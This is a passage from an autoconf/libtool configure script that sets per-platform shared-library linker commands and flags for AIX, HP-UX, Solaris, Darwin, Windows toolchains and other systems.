hardcode_direct=no hardcode_direct_absolute=no ;; esac if test yes = "$GCC"; then case $host_os in aix4.[012]|aix4.[012].*) # We only want to do this on AIX 4.2 and lower, the check # below for broken collect2 doesn't work under 4.3+ collect2name=`$CC -print-prog-name=collect2` if test -f "$collect2name" && strings "$collect2name" | $GREP resolve_lib_name >/dev/null then # We have reworked collect2 : else # We have old collect2 hardcode_direct=unsupported # It fails to find uninstalled libraries when the uninstalled # path is not listed in the libpath. Setting hardcode_minus_L # to unsupported forces relinking hardcode_minus_L=yes hardcode_libdir_flag_spec='-L$libdir' hardcode_libdir_separator= fi ;; esac shared_flag='-shared' if test yes = "$aix_use_runtimelinking"; then shared_flag="$shared_flag "'$wl-G' fi # Need to ensure runtime linking is disabled for the traditional # shared library, or the linker may eventually find shared libraries # /with/ Import File - we do not want to mix them. shared_flag_aix='-shared' shared_flag_svr4='-shared $wl-G' else # not using gcc if test ia64 = "$host_cpu"; then # VisualAge C++, Version 5.5 for AIX 5L for IA-64, Beta 3 Release # chokes on -Wl,-G. The following line is correct: shared_flag='-G' else if test yes = "$aix_use_runtimelinking"; then shared_flag='$wl-G' else shared_flag='$wl-bM:SRE' fi shared_flag_aix='$wl-bM:SRE' shared_flag_svr4='$wl-G' fi fi export_dynamic_flag_spec='$wl-bexpall' # It seems that -bexpall does not export symbols beginning with # underscore (_), so it is better to generate a list of symbols to export. always_export_symbols=yes if test aix,yes = "$with_aix_soname,$aix_use_runtimelinking"; then # Warning - without using the other runtime loading flags (-brtl), # -berok will link without error, but may produce a broken library. allow_undefined_flag='-berok' # Determine the default libpath from the value encoded in an # empty executable. if test set = "${lt_cv_aix_libpath+set}"; then aix_libpath=$lt_cv_aix_libpath else if ${lt_cv_aix_libpath_+:} false; then : $as_echo_n "(cached) " >&6 else cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int main () { ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO"; then : lt_aix_libpath_sed=' /Import File Strings/,/^$/ { /^0/ { s/^0 *\([^ ]*\) *$/\1/ p } }' lt_cv_aix_libpath_=`dump -H conftest$ac_exeext 2>/dev/null | $SED -n -e "$lt_aix_libpath_sed"` # Check for a 64-bit object if we didn't find anything. if test -z "$lt_cv_aix_libpath_"; then lt_cv_aix_libpath_=`dump -HX64 conftest$ac_exeext 2>/dev/null | $SED -n -e "$lt_aix_libpath_sed"` fi fi rm -f core conftest.err conftest.$ac_objext \ conftest$ac_exeext conftest.$ac_ext if test -z "$lt_cv_aix_libpath_"; then lt_cv_aix_libpath_=/usr/lib:/lib fi fi aix_libpath=$lt_cv_aix_libpath_ fi hardcode_libdir_flag_spec='$wl-blibpath:$libdir:'"$aix_libpath" archive_expsym_cmds='$CC -o $output_objdir/$soname $libobjs $deplibs $wl'$no_entry_flag' $compiler_flags `if test -n "$allow_undefined_flag"; then func_echo_all "$wl$allow_undefined_flag"; else :; fi` $wl'$exp_sym_flag:\$export_symbols' '$shared_flag else if test ia64 = "$host_cpu"; then hardcode_libdir_flag_spec='$wl-R $libdir:/usr/lib:/lib' allow_undefined_flag="-z nodefs" archive_expsym_cmds="\$CC $shared_flag"' -o $output_objdir/$soname $libobjs $deplibs '"\$wl$no_entry_flag"' $compiler_flags $wl$allow_undefined_flag '"\$wl$exp_sym_flag:\$export_symbols" else # Determine the default libpath from the value encoded in an # empty executable. if test set = "${lt_cv_aix_libpath+set}"; then aix_libpath=$lt_cv_aix_libpath else if ${lt_cv_aix_libpath_+:} false; then : $as_echo_n "(cached) " >&6 else cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int main () { ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO"; then : lt_aix_libpath_sed=' /Import File Strings/,/^$/ { /^0/ { s/^0 *\([^ ]*\) *$/\1/ p } }' lt_cv_aix_libpath_=`dump -H conftest$ac_exeext 2>/dev/null | $SED -n -e "$lt_aix_libpath_sed"` # Check for a 64-bit object if we didn't find anything. if test -z "$lt_cv_aix_libpath_"; then lt_cv_aix_libpath_=`dump -HX64 conftest$ac_exeext 2>/dev/null | $SED -n -e "$lt_aix_libpath_sed"` fi fi rm -f core conftest.err conftest.$ac_objext \ conftest$ac_exeext conftest.$ac_ext if test -z "$lt_cv_aix_libpath_"; then lt_cv_aix_libpath_=/usr/lib:/lib fi fi aix_libpath=$lt_cv_aix_libpath_ fi hardcode_libdir_flag_spec='$wl-blibpath:$libdir:'"$aix_libpath" # Warning - without using the other run time loading flags, # -berok will link without error, but may produce a broken library. no_undefined_flag=' $wl-bernotok' allow_undefined_flag=' $wl-berok' if test yes = "$with_gnu_ld"; then # We only use this code for GNU lds that support --whole-archive. whole_archive_flag_spec='$wl--whole-archive$convenience $wl--no-whole-archive' else # Exported symbols can be pulled into shared objects from archives whole_archive_flag_spec='$convenience' fi archive_cmds_need_lc=yes archive_expsym_cmds='$RM -r $output_objdir/$realname.d~$MKDIR $output_objdir/$realname.d' # -brtl affects multiple linker settings, -berok does not and is overridden later compiler_flags_filtered='`func_echo_all "$compiler_flags " | $SED -e "s%-brtl\\([, ]\\)%-berok\\1%g"`' if test svr4 != "$with_aix_soname"; then # This is similar to how AIX traditionally builds its shared libraries. archive_expsym_cmds="$archive_expsym_cmds"'~$CC '$shared_flag_aix' -o $output_objdir/$realname.d/$soname $libobjs $deplibs $wl-bnoentry '$compiler_flags_filtered'$wl-bE:$export_symbols$allow_undefined_flag~$AR $AR_FLAGS $output_objdir/$libname$release.a $output_objdir/$realname.d/$soname' fi if test aix != "$with_aix_soname"; then archive_expsym_cmds="$archive_expsym_cmds"'~$CC '$shared_flag_svr4' -o $output_objdir/$realname.d/$shared_archive_member_spec.o $libobjs $deplibs $wl-bnoentry '$compiler_flags_filtered'$wl-bE:$export_symbols$allow_undefined_flag~$STRIP -e $output_objdir/$realname.d/$shared_archive_member_spec.o~( func_echo_all "#! $soname($shared_archive_member_spec.o)"; if test shr_64 = "$shared_archive_member_spec"; then func_echo_all "# 64"; else func_echo_all "# 32"; fi; cat $export_symbols ) > $output_objdir/$realname.d/$shared_archive_member_spec.imp~$AR $AR_FLAGS $output_objdir/$soname $output_objdir/$realname.d/$shared_archive_member_spec.o $output_objdir/$realname.d/$shared_archive_member_spec.imp' else # used by -dlpreopen to get the symbols archive_expsym_cmds="$archive_expsym_cmds"'~$MV $output_objdir/$realname.d/$soname $output_objdir' fi archive_expsym_cmds="$archive_expsym_cmds"'~$RM -r $output_objdir/$realname.d' fi fi ;; amigaos*) case $host_cpu in powerpc) # see comment about AmigaOS4 .so support archive_cmds='$CC -shared $libobjs $deplibs $compiler_flags $wl-soname $wl$soname -o $lib' archive_expsym_cmds='' ;; m68k) archive_cmds='$RM $output_objdir/a2ixlibrary.data~$ECHO "#define NAME $libname" > $output_objdir/a2ixlibrary.data~$ECHO "#define LIBRARY_ID 1" >> $output_objdir/a2ixlibrary.data~$ECHO "#define VERSION $major" >> $output_objdir/a2ixlibrary.data~$ECHO "#define REVISION $revision" >> $output_objdir/a2ixlibrary.data~$AR $AR_FLAGS $lib $libobjs~$RANLIB $lib~(cd $output_objdir && a2ixlibrary -32)' hardcode_libdir_flag_spec='-L$libdir' hardcode_minus_L=yes ;; esac ;; bsdi[45]*) export_dynamic_flag_spec=-rdynamic ;; cygwin* | mingw* | pw32* | cegcc*) # When not using gcc, we currently assume that we are using # Microsoft Visual C++ or Intel C++ Compiler. # hardcode_libdir_flag_spec is actually meaningless, as there is # no search path for DLLs. case $cc_basename in cl* | icl*) # Native MSVC or ICC hardcode_libdir_flag_spec=' ' allow_undefined_flag=unsupported always_export_symbols=yes file_list_spec='@' # Tell ltmain to make .lib files, not .a files. libext=lib # Tell ltmain to make .dll files, not .so files. shrext_cmds=.dll # FIXME: Setting linknames here is a bad hack. archive_cmds='$CC -o $output_objdir/$soname $libobjs $compiler_flags $deplibs -Wl,-DLL,-IMPLIB:"$tool_output_objdir$libname.dll.lib"~linknames=' archive_expsym_cmds='if test DEF = "`$SED -n -e '\''s/^[ ]*//'\'' -e '\''/^\(;.*\)*$/d'\'' -e '\''s/^\(EXPORTS\|LIBRARY\)\([ ].*\)*$/DEF/p'\'' -e q $export_symbols`" ; then cp "$export_symbols" "$output_objdir/$soname.def"; echo "$tool_output_objdir$soname.def" > "$output_objdir/$soname.exp"; else $SED -e '\''s/^/-link -EXPORT:/'\'' < $export_symbols > $output_objdir/$soname.exp; fi~ $CC -o $tool_output_objdir$soname $libobjs $compiler_flags $deplibs "@$tool_output_objdir$soname.exp" -Wl,-DLL,-IMPLIB:"$tool_output_objdir$libname.dll.lib"~ linknames=' # The linker will not automatically build a static lib if we build a DLL. # _LT_TAGVAR(old_archive_from_new_cmds, )='true' enable_shared_with_static_runtimes=yes exclude_expsyms='_NULL_IMPORT_DESCRIPTOR|_IMPORT_DESCRIPTOR_.*' export_symbols_cmds='$NM $libobjs $convenience | $global_symbol_pipe | $SED -e '\''/^[BCDGRS][ ]/s/.*[ ]\([^ ]*\)/\1,DATA/'\'' | $SED -e '\''/^[AITW][ ]/s/.*[ ]//'\'' | sort | uniq > $export_symbols' # Don't use ranlib old_postinstall_cmds='chmod 644 $oldlib' postlink_cmds='lt_outputfile="@OUTPUT@"~ lt_tool_outputfile="@TOOL_OUTPUT@"~ case $lt_outputfile in *.exe|*.EXE) ;; *) lt_outputfile=$lt_outputfile.exe lt_tool_outputfile=$lt_tool_outputfile.exe ;; esac~ if test : != "$MANIFEST_TOOL" && test -f "$lt_outputfile.manifest"; then $MANIFEST_TOOL -manifest "$lt_tool_outputfile.manifest" -outputresource:"$lt_tool_outputfile" || exit 1; $RM "$lt_outputfile.manifest"; fi' ;; *) # Assume MSVC and ICC wrapper hardcode_libdir_flag_spec=' ' allow_undefined_flag=unsupported # Tell ltmain to make .lib files, not .a files. libext=lib # Tell ltmain to make .dll files, not .so files. shrext_cmds=.dll # FIXME: Setting linknames here is a bad hack. archive_cmds='$CC -o $lib $libobjs $compiler_flags `func_echo_all "$deplibs" | $SED '\''s/ -lc$//'\''` -link -dll~linknames=' # The linker will automatically build a .lib file if we build a DLL. old_archive_from_new_cmds='true' # FIXME: Should let the user specify the lib program. old_archive_cmds='lib -OUT:$oldlib$oldobjs$old_deplibs' enable_shared_with_static_runtimes=yes ;; esac ;; darwin* | rhapsody*) archive_cmds_need_lc=no hardcode_direct=no hardcode_automatic=yes hardcode_shlibpath_var=unsupported if test yes = "$lt_cv_ld_force_load"; then whole_archive_flag_spec='`for conv in $convenience\"\"; do test -n \"$conv\" && new_convenience=\"$new_convenience $wl-force_load,$conv\"; done; func_echo_all \"$new_convenience\"`' else whole_archive_flag_spec='' fi link_all_deplibs=yes allow_undefined_flag=$_lt_dar_allow_undefined case $cc_basename in ifort*|nagfor*) _lt_dar_can_shared=yes ;; *) _lt_dar_can_shared=$GCC ;; esac if test yes = "$_lt_dar_can_shared"; then output_verbose_link_cmd=func_echo_all archive_cmds="\$CC -dynamiclib \$allow_undefined_flag -o \$lib \$libobjs \$deplibs \$compiler_flags -install_name \$rpath/\$soname \$verstring $_lt_dar_single_mod$_lt_dsymutil" module_cmds="\$CC \$allow_undefined_flag -o \$lib -bundle \$libobjs \$deplibs \$compiler_flags$_lt_dsymutil" archive_expsym_cmds="sed 's|^|_|' < \$export_symbols > \$output_objdir/\$libname-symbols.expsym~\$CC -dynamiclib \$allow_undefined_flag -o \$lib \$libobjs \$deplibs \$compiler_flags -install_name \$rpath/\$soname \$verstring $_lt_dar_single_mod$_lt_dar_export_syms$_lt_dsymutil" module_expsym_cmds="sed -e 's|^|_|' < \$export_symbols > \$output_objdir/\$libname-symbols.expsym~\$CC \$allow_undefined_flag -o \$lib -bundle \$libobjs \$deplibs \$compiler_flags$_lt_dar_export_syms$_lt_dsymutil" else ld_shlibs=no fi ;; dgux*) archive_cmds='$LD -G -h $soname -o $lib $libobjs $deplibs $linker_flags' hardcode_libdir_flag_spec='-L$libdir' hardcode_shlibpath_var=no ;; # FreeBSD 2.2.[012] allows us to include c++rt0.o to get C++ constructor # support. Future versions do this automatically, but an explicit c++rt0.o # does not break anything, and helps significantly (at the cost of a little # extra space). freebsd2.2*) archive_cmds='$LD -Bshareable -o $lib $libobjs $deplibs $linker_flags /usr/lib/c++rt0.o' hardcode_libdir_flag_spec='-R$libdir' hardcode_direct=yes hardcode_shlibpath_var=no ;; # Unfortunately, older versions of FreeBSD 2 do not have this feature. freebsd2.*) archive_cmds='$LD -Bshareable -o $lib $libobjs $deplibs $linker_flags' hardcode_direct=yes hardcode_minus_L=yes hardcode_shlibpath_var=no ;; # FreeBSD 3 and greater uses gcc -shared to do shared libraries. freebsd* | dragonfly*) archive_cmds='$CC -shared $pic_flag -o $lib $libobjs $deplibs $compiler_flags' hardcode_libdir_flag_spec='-R$libdir' hardcode_direct=yes hardcode_shlibpath_var=no ;; hpux9*) if test yes = "$GCC"; then archive_cmds='$RM $output_objdir/$soname~$CC -shared $pic_flag $wl+b $wl$install_libdir -o $output_objdir/$soname $libobjs $deplibs $compiler_flags~test "x$output_objdir/$soname" = "x$lib" || mv $output_objdir/$soname $lib' else archive_cmds='$RM $output_objdir/$soname~$LD -b +b $install_libdir -o $output_objdir/$soname $libobjs $deplibs $linker_flags~test "x$output_objdir/$soname" = "x$lib" || mv $output_objdir/$soname $lib' fi hardcode_libdir_flag_spec='$wl+b $wl$libdir' hardcode_libdir_separator=: hardcode_direct=yes # hardcode_minus_L: Not really in the search PATH, # but as the default location of the library. hardcode_minus_L=yes export_dynamic_flag_spec='$wl-E' ;; hpux10*) if test yes,no = "$GCC,$with_gnu_ld"; then archive_cmds='$CC -shared $pic_flag $wl+h $wl$soname $wl+b $wl$install_libdir -o $lib $libobjs $deplibs $compiler_flags' else archive_cmds='$LD -b +h $soname +b $install_libdir -o $lib $libobjs $deplibs $linker_flags' fi if test no = "$with_gnu_ld"; then hardcode_libdir_flag_spec='$wl+b $wl$libdir' hardcode_libdir_separator=: hardcode_direct=yes hardcode_direct_absolute=yes export_dynamic_flag_spec='$wl-E' # hardcode_minus_L: Not really in the search PATH, # but as the default location of the library. hardcode_minus_L=yes fi ;; hpux11*) if test yes,no = "$GCC,$with_gnu_ld"; then case $host_cpu in hppa*64*) archive_cmds='$CC -shared $wl+h $wl$soname -o $lib $libobjs $deplibs $compiler_flags' ;; ia64*) archive_cmds='$CC -shared $pic_flag $wl+h $wl$soname $wl+nodefaultrpath -o $lib $libobjs $deplibs $compiler_flags' ;; *) archive_cmds='$CC -shared $pic_flag $wl+h $wl$soname $wl+b $wl$install_libdir -o $lib $libobjs $deplibs $compiler_flags' ;; esac else case $host_cpu in hppa*64*) archive_cmds='$CC -b $wl+h $wl$soname -o $lib $libobjs $deplibs $compiler_flags' ;; ia64*) archive_cmds='$CC -b $wl+h $wl$soname $wl+nodefaultrpath -o $lib $libobjs $deplibs $compiler_flags' ;; *) # Older versions of the 11.00 compiler do not understand -b yet # (HP92453-01 A.11.01.20 doesn't, HP92453-01 B.11.X.35175-35176.GP does) { $as_echo "$as_me:${as_lineno-$LINENO}: checking if $CC understands -b" >&5 $as_echo_n "checking if $CC understands -b... " >&6; } if ${lt_cv_prog_compiler__b+:} false; then : $as_echo_n "(cached) " >&6 else lt_cv_prog_compiler__b=no save_LDFLAGS=$LDFLAGS LDFLAGS="$LDFLAGS -b" echo "$lt_simple_link_test_code" > conftest.$ac_ext if (eval $ac_link 2>conftest.err) && test -s conftest$ac_exeext; then # The linker can only warn and ignore the option if not recognized # So say no if there are warnings if test -s conftest.err; then # Append any errors to the config.log. cat conftest.err 1>&5 $ECHO "$_lt_linker_boilerplate" | $SED '/^$/d' > conftest.exp $SED '/^$/d; /^ *+/d' conftest.err >conftest.er2 if diff conftest.exp conftest.er2 >/dev/null; then lt_cv_prog_compiler__b=yes fi else lt_cv_prog_compiler__b=yes fi fi $RM -r conftest* LDFLAGS=$save_LDFLAGS fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_prog_compiler__b" >&5 $as_echo "$lt_cv_prog_compiler__b" >&6; } if test yes = "$lt_cv_prog_compiler__b"; then archive_cmds='$CC -b $wl+h $wl$soname $wl+b $wl$install_libdir -o $lib $libobjs $deplibs $compiler_flags' else archive_cmds='$LD -b +h $soname +b $install_libdir -o $lib $libobjs $deplibs $linker_flags' fi ;; esac fi if test no = "$with_gnu_ld"; then hardcode_libdir_flag_spec='$wl+b $wl$libdir' hardcode_libdir_separator=: case $host_cpu in hppa*64*|ia64*) hardcode_direct=no hardcode_shlibpath_var=no ;; *) hardcode_direct=yes hardcode_direct_absolute=yes export_dynamic_flag_spec='$wl-E' # hardcode_minus_L: Not really in the search PATH, # but as the default location of the library. hardcode_minus_L=yes ;; esac fi ;; irix5* | irix6* | nonstopux*) if test yes = "$GCC"; then archive_cmds='$CC -shared $pic_flag $libobjs $deplibs $compiler_flags $wl-soname $wl$soname `test -n "$verstring" && func_echo_all "$wl-set_version $wl$verstring"` $wl-update_registry $wl$output_objdir/so_locations -o $lib' # Try to use the -exported_symbol ld option, if it does not # work, assume that -exports_file does not work either and # implicitly export all symbols. # This should be the same for all languages, so no per-tag cache variable. { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether the $host_os linker accepts -exported_symbol" >&5 $as_echo_n "checking whether the $host_os linker accepts -exported_symbol... " >&6; } if ${lt_cv_irix_exported_symbol+:} false; then : $as_echo_n "(cached) " >&6 else save_LDFLAGS=$LDFLAGS LDFLAGS="$LDFLAGS -shared $wl-exported_symbol ${wl}foo $wl-update_registry $wl/dev/null" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int foo (void) { return 0; } _ACEOF if ac_fn_c_try_link "$LINENO"; then : lt_cv_irix_exported_symbol=yes else lt_cv_irix_exported_symbol=no fi rm -f core conftest.err conftest.$ac_objext \ conftest$ac_exeext conftest.$ac_ext LDFLAGS=$save_LDFLAGS fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_irix_exported_symbol" >&5 $as_echo "$lt_cv_irix_exported_symbol" >&6; } if test yes = "$lt_cv_irix_exported_symbol"; then archive_expsym_cmds='$CC -shared $pic_flag $libobjs $deplibs $compiler_flags $wl-soname $wl$soname `test -n "$verstring" && func_echo_all "$wl-set_version $wl$verstring"` $wl-update_registry $wl$output_objdir/so_locations $wl-exports_file $wl$export_symbols -o $lib' fi else archive_cmds='$CC -shared $libobjs $deplibs $compiler_flags -soname $soname `test -n "$verstring" && func_echo_all "-set_version $verstring"` -update_registry $output_objdir/so_locations -o $lib' archive_expsym_cmds='$CC -shared $libobjs $deplibs $compiler_flags -soname $soname `test -n "$verstring" && func_echo_all "-set_version $verstring"` -update_registry $output_objdir/so_locations -exports_file $export_symbols -o $lib' fi archive_cmds_need_lc='no' hardcode_libdir_flag_spec='$wl-rpath $wl$libdir' hardcode_libdir_separator=: inherit_rpath=yes link_all_deplibs=yes ;; linux*) case $cc_basename in tcc*) # Fabrice Bellard et al's Tiny C Compiler ld_shlibs=yes archive_cmds='$CC -shared $pic_flag -o $lib $libobjs $deplibs $compiler_flags' ;; esac ;; netbsd*) if echo __ELF__ | $CC -E - | $GREP __ELF__ >/dev/null; then archive_cmds='$LD -Bshareable -o $lib $libobjs $deplibs $linker_flags' # a.out else archive_cmds='$LD -shared -o $lib $libobjs $deplibs $linker_flags' # ELF fi hardcode_libdir_flag_spec='-R$libdir' hardcode_direct=yes hardcode_shlibpath_var=no ;; newsos6) archive_cmds='$LD -G -h $soname -o $lib $libobjs $deplibs $linker_flags' hardcode_direct=yes hardcode_libdir_flag_spec='$wl-rpath $wl$libdir' hardcode_libdir_separator=: hardcode_shlibpath_var=no ;; *nto* | *qnx*) ;; openbsd* | bitrig*) if test -f /usr/libexec/ld.so; then hardcode_direct=yes hardcode_shlibpath_var=no hardcode_direct_absolute=yes if test -z "`echo __ELF__ | $CC -E - | $GREP __ELF__`"; then archive_cmds='$CC -shared $pic_flag -o $lib $libobjs $deplibs $compiler_flags' archive_expsym_cmds='$CC -shared $pic_flag -o $lib $libobjs $deplibs $compiler_flags $wl-retain-symbols-file,$export_symbols' hardcode_libdir_flag_spec='$wl-rpath,$libdir' export_dynamic_flag_spec='$wl-E' else archive_cmds='$CC -shared $pic_flag -o $lib $libobjs $deplibs $compiler_flags' hardcode_libdir_flag_spec='$wl-rpath,$libdir' fi else ld_shlibs=no fi ;; os2*) hardcode_libdir_flag_spec='-L$libdir' hardcode_minus_L=yes allow_undefined_flag=unsupported shrext_cmds=.dll archive_cmds='$ECHO "LIBRARY ${soname%$shared_ext} INITINSTANCE TERMINSTANCE" > $output_objdir/$libname.def~ $ECHO "DESCRIPTION \"$libname\"" >> $output_objdir/$libname.def~ $ECHO "DATA MULTIPLE NONSHARED" >> $output_objdir/$libname.def~ $ECHO EXPORTS >> $output_objdir/$libname.def~ emxexp $libobjs | $SED /"_DLL_InitTerm"/d >> $output_objdir/$libname.def~ $CC -Zdll -Zcrtdll -o $output_objdir/$soname $libobjs $deplibs $compiler_flags $output_objdir/$libname.def~ emximp -o $lib $output_objdir/$libname.def' archive_expsym_cmds='$ECHO "LIBRARY ${soname%$shared_ext} INITINSTANCE TERMINSTANCE" > $output_objdir/$libname.def~ $ECHO "DESCRIPTION \"$libname\"" >> $output_objdir/$libname.def~ $ECHO "DATA MULTIPLE NONSHARED" >> $output_objdir/$libname.def~ $ECHO EXPORTS >> $output_objdir/$libname.def~ prefix_cmds="$SED"~ if test EXPORTS = "`$SED 1q $export_symbols`"; then prefix_cmds="$prefix_cmds -e 1d"; fi~ prefix_cmds="$prefix_cmds -e \"s/^\(.*\)$/_\1/g\""~ cat $export_symbols | $prefix_cmds >> $output_objdir/$libname.def~ $CC -Zdll -Zcrtdll -o $output_objdir/$soname $libobjs $deplibs $compiler_flags $output_objdir/$libname.def~ emximp -o $lib $output_objdir/$libname.def' old_archive_From_new_cmds='emximp -o $output_objdir/${libname}_dll.a $output_objdir/$libname.def' enable_shared_with_static_runtimes=yes file_list_spec='@' ;; osf3*) if test yes = "$GCC"; then allow_undefined_flag=' $wl-expect_unresolved $wl\*' archive_cmds='$CC -shared$allow_undefined_flag $libobjs $deplibs $compiler_flags $wl-soname $wl$soname `test -n "$verstring" && func_echo_all "$wl-set_version $wl$verstring"` $wl-update_registry $wl$output_objdir/so_locations -o $lib' else allow_undefined_flag=' -expect_unresolved \*' archive_cmds='$CC -shared$allow_undefined_flag $libobjs $deplibs $compiler_flags -soname $soname `test -n "$verstring" && func_echo_all "-set_version $verstring"` -update_registry $output_objdir/so_locations -o $lib' fi archive_cmds_need_lc='no' hardcode_libdir_flag_spec='$wl-rpath $wl$libdir' hardcode_libdir_separator=: ;; osf4* | osf5*) # as osf3* with the addition of -msym flag if test yes = "$GCC"; then allow_undefined_flag=' $wl-expect_unresolved $wl\*' archive_cmds='$CC -shared$allow_undefined_flag $pic_flag $libobjs $deplibs $compiler_flags $wl-msym $wl-soname $wl$soname `test -n "$verstring" && func_echo_all "$wl-set_version $wl$verstring"` $wl-update_registry $wl$output_objdir/so_locations -o $lib' hardcode_libdir_flag_spec='$wl-rpath $wl$libdir' else allow_undefined_flag=' -expect_unresolved \*' archive_cmds='$CC -shared$allow_undefined_flag $libobjs $deplibs $compiler_flags -msym -soname $soname `test -n "$verstring" && func_echo_all "-set_version $verstring"` -update_registry $output_objdir/so_locations -o $lib' archive_expsym_cmds='for i in `cat $export_symbols`; do printf "%s %s\\n" -exported_symbol "\$i" >> $lib.exp; done; printf "%s\\n" "-hidden">> $lib.exp~ $CC -shared$allow_undefined_flag $wl-input $wl$lib.exp $compiler_flags $libobjs $deplibs -soname $soname `test -n "$verstring" && $ECHO "-set_version $verstring"` -update_registry $output_objdir/so_locations -o $lib~$RM $lib.exp' # Both c and cxx compiler support -rpath directly hardcode_libdir_flag_spec='-rpath $libdir' fi archive_cmds_need_lc='no' hardcode_libdir_separator=: ;; solaris*) no_undefined_flag=' -z defs' if test yes = "$GCC"; then wlarc='$wl' archive_cmds='$CC -shared $pic_flag $wl-z ${wl}text $wl-h $wl$soname -o $lib $libobjs $deplibs $compiler_flags' archive_expsym_cmds='echo "{ global:" > $lib.exp~cat $export_symbols | $SED -e "s/\(.*\)/\1;/" >> $lib.exp~echo "local: *; };" >> $lib.exp~ $CC -shared $pic_flag $wl-z ${wl}text $wl-M $wl$lib.exp $wl-h $wl$soname -o $lib $libobjs $deplibs $compiler_flags~$RM $lib.exp' else case `$CC -V 2>&1` in *"Compilers 5.0"*) wlarc='' archive_cmds='$LD -G$allow_undefined_flag -h $soname -o $lib $libobjs $deplibs $linker_flags' archive_expsym_cmds='echo "{ global:" > $lib.exp~cat $export_symbols | $SED -e "s/\(.*\)/\1;/" >> $lib.exp~echo "local: *; };" >> $lib.exp~ $LD -G$allow_undefined_flag -M $lib.exp -h $soname -o $lib $libobjs $deplibs $linker_flags~$RM $lib.exp' ;; *) wlarc='$wl' archive_cmds='$CC -G$allow_undefined_flag -h $soname -o $lib $libobjs $deplibs $compiler_flags' archive_expsym_cmds='echo "{ global:" > $lib.exp~cat $export_symbols | $SED -e "s/\(.*\)/\1;/" >> $lib.exp~echo "local: *; };" >> $lib.exp~ $CC -G$allow_undefined_flag -M $lib.exp -h $soname -o $lib $libobjs $deplibs $compiler_flags~$RM $lib.exp' ;; esac fi hardcode_libdir_flag_spec='-R$libdir' hardcode_shlibpath_var=no case $host_os in solaris2.[0-5] | solaris2.[0-5].*) ;; *) # The compiler driver will combine and reorder linker options, # but understands '-z linker_flag'. GCC discards it without '$wl', # but is careful enough not to reorder. # Supported since Solaris 2.6 (maybe 2.5.1?) if test yes = "$GCC"; then whole_archive_flag_spec='$wl-z ${wl}allextract$convenience $wl-z ${wl}defaultextract' else whole_archive_flag_spec='-z allextract$convenience -z defaultextract' fi ;; esac link_all_deplibs=yes ;; sunos4*) if test sequent = "$host_vendor"; then # Use $CC to link under sequent, because it throws in some extra .o # files that make .init and .fini sections work. archive_cmds='$CC -G $wl-h $soname -o $lib $libobjs $deplibs $compiler_flags' else archive_cmds='$LD -assert pure-text -Bstatic -o $lib $libobjs $deplibs $linker_flags' fi hardcode_libdir_flag_spec='-L$libdir' hardcode_direct=yes hardcode_minus_L=yes hardcode_shlibpath_var=no ;; sysv4) case $host_vendor in sni) archive_cmds='$LD -G -h $soname -o $lib $libobjs $deplibs $linker_flags' hardcode_direct=yes # is this really true??? ;; siemens) ## LD is ld it makes a PLAMLIB ## CC just makes a GrossModule. archive_cmds='$LD -G -o $lib $libobjs $deplibs $linker_flags' reload_cmds='$CC -r -o $output$reload_objs' hardcode_direct=no ;; motorola) archive_cmds='$LD -G -h $soname -o $lib $libobjs $deplibs $linker_flags' hardcode_direct=no #Motorola manual says yes, but my tests say they lie ;; esac runpath_var='LD_RUN_PATH' hardcode_shlibpath_var=no ;; sysv4.3*) archive_cmds='$LD -G -h $soname -o $lib $libobjs $deplibs $linker_flags' hardcode_shlibpath_var=no export_dynamic_flag_spec='-Bexport' ;; sysv4*MP*) if test -d /usr/nec; then archive_cmds='$LD -G -h $soname -o $lib $libobjs $deplibs $linker_flags' hardcode_shlibpath_var=no runpath_var=LD_RUN_PATH hardcode_runpath_var=yes ld_shlibs=yes fi ;; sysv4*uw2* | sysv5OpenUNIX* | sysv5UnixWare7.[01].[10]* | unixware7* | sco3.2v5.0.[024]*) no_undefined_flag='$wl-z,text' archive_cmds_need_lc=no hardcode_shlibpath_var=no runpath_var='LD_RUN_PATH' if test yes = "$GCC"; then archive_cmds='$CC -shared $wl-h,$soname -o $lib $libobjs $deplibs $compiler_flags' archive_expsym_cmds='$CC -shared $wl-Bexport:$export_symbols $wl-h,$soname -o $lib $libobjs $deplibs $compiler_flags' else archive_cmds='$CC -G $wl-h,$soname -o $lib $libobjs $deplibs $compiler_flags' archive_expsym_cmds='$CC -G $wl-Bexport:$export_symbols $wl-h,$soname -o $lib $libobjs $deplibs $compiler_flags' fi ;; sysv5* | sco3.2v5* | sco5v6*) # Note: We CANNOT use -z defs as we might desire, because we do not # link with -lc, and that would cause any symbols used from libc to # always be unresolved, which means just about no library would # ever link correctly. If we're not using GNU ld we use -z text # though, which does catch some bad symbols but isn't as heavy-handed # as -z defs. no_undefined_flag='$wl-z,text' allow_undefined_flag='$wl-z,nodefs' archive_cmds_need_lc=no hardcode_shlibpath_var=no hardcode_libdir_flag_spec='$wl-R,$libdir' hardcode_libdir_separator=':' link_all_deplibs=yes export_dynamic_flag_spec='$wl-Bexport' runpath_var='LD_RUN_PATH' if test yes = "$GCC"; then archive_cmds='$CC -shared $wl-h,$soname -o $lib $libobjs $deplibs $compiler_flags' archive_expsym_cmds='$CC -shared $wl-Bexport:$export_symbols $wl-h,$soname -o $lib $libobjs $deplibs $compiler_flags' else archive_cmds='$CC -G $wl-h,$soname -o $lib $libobjs $deplibs $compiler_flags' archive_expsym_cmds='$CC -G $wl-Bexport:$export_symbols $wl-h,$soname -o $lib $libobjs $deplibs $compiler_flags' fi ;; uts4*) archive_cmds='$LD -G -h $soname -o $lib $libobjs $deplibs $linker_flags' hardcode_libdir_flag_spec='-L$libdir' hardcode_shlibpath_var=no ;; *) ld_shlibs=no ;; esac if test sni = "$host_vendor"; then case $host in sysv4 | sysv4.2uw2* | sysv4.3* | sysv5*) export_dynamic_flag_spec='$wl-Blargedynsym' ;; esac fi fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ld_shlibs" >&5 $as_echo "$ld_shlibs" >&6; } test no = "$ld_shlibs" && can_build_shared=no with_gnu_ld=$with_gnu_ld # # Do we need to explicitly link libc? # case "x$archive_cmds_need_lc" in x|xyes) # Assume -lc should be added archive_cmds_need_lc=yes if test yes,yes = 